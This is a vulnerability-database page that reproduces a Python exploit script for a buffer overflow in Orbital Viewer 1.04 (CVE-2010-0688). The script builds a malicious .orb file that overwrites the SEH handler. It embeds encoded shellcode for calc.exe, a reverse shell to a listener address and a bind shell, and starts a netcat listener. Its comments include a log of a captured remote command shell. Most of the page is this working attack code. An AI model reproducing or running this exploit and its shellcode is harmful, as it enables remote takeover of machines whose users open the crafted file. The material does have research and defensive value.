Vulners
Lucene search
Orbital Viewer 1.04 - (.orb) Local Universal SEH Overflow Exploit (0day)
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit | 26 Feb 201000:00 | – | zdt |
 | CVE-2010-0688 | 26 Feb 201000:00 | – | circl |
 | Orbitals.com Orbital Viewer .orb Stack Buffer Overflow (CVE-2010-0688) | 2 Jan 201000:00 | – | checkpoint_advisories |
 | CVE-2010-0688 | 19 Mar 201020:00 | – | cve |
 | CVE-2010-0688 | 19 Mar 201020:00 | – | cvelist |
 | Orbital Viewer 1.04 - '.orb' File Local Universal Overflow (SEH) | 26 Feb 201000:00 | – | exploitdb |
| Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit) | 9 Mar 201000:00 | – | exploitdb |
 | Orbital Viewer 1.04 - .orb File Local Universal Overflow (SEH) | 26 Feb 201000:00 | – | exploitpack |
 | Orbital Viewer ORB File Parsing Buffer Overflow | 9 Mar 201001:04 | – | metasploit |
 | CVE-2010-0688 | 19 Mar 201020:30 | – | nvd |
10
#!/usr/bin/python
#
################################################################
#
# Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
# Date: 27 Feb 2010
# CVE: CVE-2010-0688
# Download: http://www.orbitals.com/orb/ov.htm
# Found & exploited by: mr_me (http://net-ninja.net)
# Greetz to: corelanc0d3r/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz/Redsees
# Tested on: Windows xp sp3
#
################################################################
# Bad chars: \x00\x0a\xbd\x0d\x20
# Here we go.. ! ...all the way from Australia...
#
# [+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit
# [+] Shellcode options
# 1: calc.exe
# 2: reverse shell
# 3: bind shell
# [+] which shellcode? 2
# [+] Vulnerable file created!
# [+] Listening on port 4444...
# listening on [any] 4444 ...
# 192.168.2.55: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.55] 2222
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Steve>
#
import sys, os
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit"
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, CMD=calc.exe
calc = ("\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55"
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c"
"\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b"
"\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49"
"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51"
"\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50"
"\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34"
"\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51"
"\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31"
"\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50"
"\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30"
"\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c"
"\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a"
"\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a"
"\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43"
"\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45"
"\x50\x41\x41")
# windows/shell_reverse_tcp - 636 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444
rev = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x46\x44\x47\x54\x4c\x4b"
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x43\x31\x4a"
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x45\x51"
"\x4a\x4b\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
"\x31\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x43\x44\x45\x57"
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4a\x54\x47"
"\x4b\x50\x54\x46\x44\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
"\x47\x54\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
"\x4b\x39\x42\x4c\x51\x34\x45\x4c\x45\x31\x48\x43\x46\x51\x49"
"\x4b\x42\x44\x4c\x4b\x50\x43\x50\x30\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
"\x48\x56\x45\x36\x46\x33\x43\x56\x45\x38\x46\x53\x46\x52\x43"
"\x58\x43\x47\x43\x43\x47\x42\x51\x4f\x46\x34\x4b\x4f\x4e\x30"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48"
"\x56\x51\x4f\x4d\x59\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x43\x38"
"\x43\x32\x51\x45\x42\x4a\x43\x32\x4b\x4f\x48\x50\x43\x58\x4e"
"\x39\x45\x59\x4b\x45\x4e\x4d\x46\x37\x4b\x4f\x48\x56\x51\x43"
"\x46\x33\x51\x43\x51\x43\x51\x53\x51\x43\x47\x33\x46\x33\x4b"
"\x4f\x4e\x30\x42\x48\x49\x50\x49\x38\x44\x42\x44\x4a\x42\x46"
"\x42\x48\x42\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4b\x51\x4d"
"\x45\x42\x48\x4a\x4c\x4c\x39\x4e\x4a\x43\x50\x51\x47\x4b\x4f"
"\x48\x56\x42\x4a\x42\x30\x46\x31\x50\x55\x4b\x4f\x48\x50\x45"
"\x36\x43\x5a\x42\x44\x45\x36\x42\x48\x43\x53\x42\x4d\x43\x5a"
"\x50\x50\x46\x39\x47\x59\x48\x4c\x4c\x49\x4a\x47\x43\x5a\x47"
"\x34\x4c\x49\x4d\x32\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4a\x35"
"\x4d\x59\x4b\x4d\x4b\x4e\x51\x52\x46\x4d\x4b\x4e\x50\x42\x46"
"\x4c\x4c\x4d\x43\x4a\x47\x48\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48"
"\x44\x32\x4b\x4e\x4e\x53\x42\x36\x4b\x4f\x44\x35\x47\x58\x4b"
"\x4f\x4e\x36\x51\x4b\x46\x37\x50\x52\x50\x51\x50\x51\x50\x51"
"\x42\x4a\x45\x51\x46\x31\x50\x51\x46\x35\x46\x31\x4b\x4f\x48"
"\x50\x42\x48\x4e\x4d\x4e\x39\x44\x45\x48\x4e\x46\x33\x4b\x4f"
"\x4e\x36\x42\x4a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x4e\x30\x43"
"\x58\x4d\x37\x43\x49\x48\x46\x44\x39\x4b\x4f\x43\x45\x43\x34"
"\x4b\x4f\x49\x46\x4b\x4f\x42\x57\x4b\x4c\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
"\x4b\x4f\x4e\x30\x41\x41")
# windows/shell_bind_tcp - 695 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=192.168.2.55
bind =("\xdb\xc1\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x43\x5a\x4a\x4b\x50\x4d\x4a\x48\x4c\x39\x4b\x4f\x4b\x4f"
"\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b\x47"
"\x35\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f"
"\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51\x4a"
"\x4b\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x43\x31\x4a\x4e\x50\x31"
"\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x44\x47\x49"
"\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47\x4b"
"\x50\x54\x47\x54\x47\x58\x42\x55\x4d\x35\x4c\x4b\x51\x4f\x51"
"\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b"
"\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b\x4d"
"\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49\x4b"
"\x43\x54\x4c\x4b\x51\x53\x46\x50\x4c\x4b\x47\x30\x44\x4c\x4c"
"\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51\x4e"
"\x43\x58\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x48"
"\x56\x45\x36\x50\x53\x42\x46\x43\x58\x47\x43\x46\x52\x42\x48"
"\x43\x47\x44\x33\x50\x32\x51\x4f\x46\x34\x4b\x4f\x48\x50\x43"
"\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x49\x46"
"\x51\x4f\x4c\x49\x4a\x45\x45\x36\x4d\x51\x4a\x4d\x44\x48\x45"
"\x52\x46\x35\x43\x5a\x43\x32\x4b\x4f\x48\x50\x42\x48\x49\x49"
"\x44\x49\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x4e\x36\x50\x53\x46"
"\x33\x46\x33\x46\x33\x51\x43\x50\x43\x50\x53\x47\x33\x50\x53"
"\x4b\x4f\x4e\x30\x45\x36\x42\x48\x44\x51\x51\x4c\x43\x56\x51"
"\x43\x4c\x49\x4b\x51\x4d\x45\x43\x58\x49\x34\x44\x5a\x42\x50"
"\x49\x57\x51\x47\x4b\x4f\x4e\x36\x42\x4a\x44\x50\x46\x31\x50"
"\x55\x4b\x4f\x48\x50\x42\x48\x49\x34\x4e\x4d\x46\x4e\x4a\x49"
"\x51\x47\x4b\x4f\x49\x46\x50\x53\x46\x35\x4b\x4f\x48\x50\x45"
"\x38\x4d\x35\x51\x59\x4b\x36\x51\x59\x46\x37\x4b\x4f\x4e\x36"
"\x46\x30\x46\x34\x51\x44\x51\x45\x4b\x4f\x48\x50\x4a\x33\x43"
"\x58\x4a\x47\x42\x59\x49\x56\x42\x59\x51\x47\x4b\x4f\x49\x46"
"\x46\x35\x4b\x4f\x4e\x30\x45\x36\x43\x5a\x45\x34\x43\x56\x42"
"\x48\x42\x43\x42\x4d\x4d\x59\x4d\x35\x42\x4a\x46\x30\x51\x49"
"\x47\x59\x48\x4c\x4d\x59\x4b\x57\x43\x5a\x51\x54\x4b\x39\x4a"
"\x42\x50\x31\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x51\x52\x46\x4d"
"\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58\x4e"
"\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x45\x46"
"\x4b\x4f\x43\x45\x47\x34\x4b\x4f\x4e\x36\x51\x4b\x46\x37\x50"
"\x52\x46\x31\x46\x31\x46\x31\x42\x4a\x43\x31\x46\x31\x46\x31"
"\x46\x35\x46\x31\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x48\x59\x45"
"\x55\x48\x4e\x46\x33\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b\x4f"
"\x46\x57\x4b\x4f\x4e\x30\x4c\x4b\x46\x37\x4b\x4c\x4d\x53\x48"
"\x44\x45\x34\x4b\x4f\x48\x56\x50\x52\x4b\x4f\x48\x50\x45\x38"
"\x4c\x30\x4c\x4a\x45\x54\x51\x4f\x46\x33\x4b\x4f\x49\x46\x4b"
"\x4f\x4e\x30\x41\x41");
header = "\x4f\x72\x62\x69\x74\x61\x6c\x46"
header += "\x69\x6c\x65\x56\x31\x2e\x30\x0d\x0a"
nops = "\x90" * 1010
fly = "\xe9\xc8\xf9\xff\xff"
nseh = "\xeb\xf9\x90\x90"
seh = "\x50\x82\x45" # partial overwrite - ppr from ov.exe
print "[+] Shellcode options"
print "\t1: calc.exe"
print "\t2: reverse shell"
print "\t3: bind shell"
msg = '[+] which shellcode? '
uin = raw_input(msg).strip()
if not uin:
print "[-] You have not entered 1,2 or 3, quiting"
sys.exit(1)
if uin == '1':
junk = "\x41" * (5045 - len(calc))
lol = header + junk + nops + calc + fly + nseh + seh;
if uin == '2':
junk = "\x41" * (5045 - len(rev))
lol = header + junk + nops + rev + fly + nseh + seh;
if uin == '3':
junk = "\x41" * (5045 - len(bind))
lol = header + junk + nops + bind + fly + nseh + seh;
try:
vulnerable = open("mr_me-owns-orbital.orb",'w')
vulnerable.write(lol)
vulnerable.close()
print "[+] Vulnerable file created!"
if uin == '2':
print "[+] Listening on port 4444..."
os.system("nc -lvp 4444")
except:
print "[-] Error occured!"
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.67507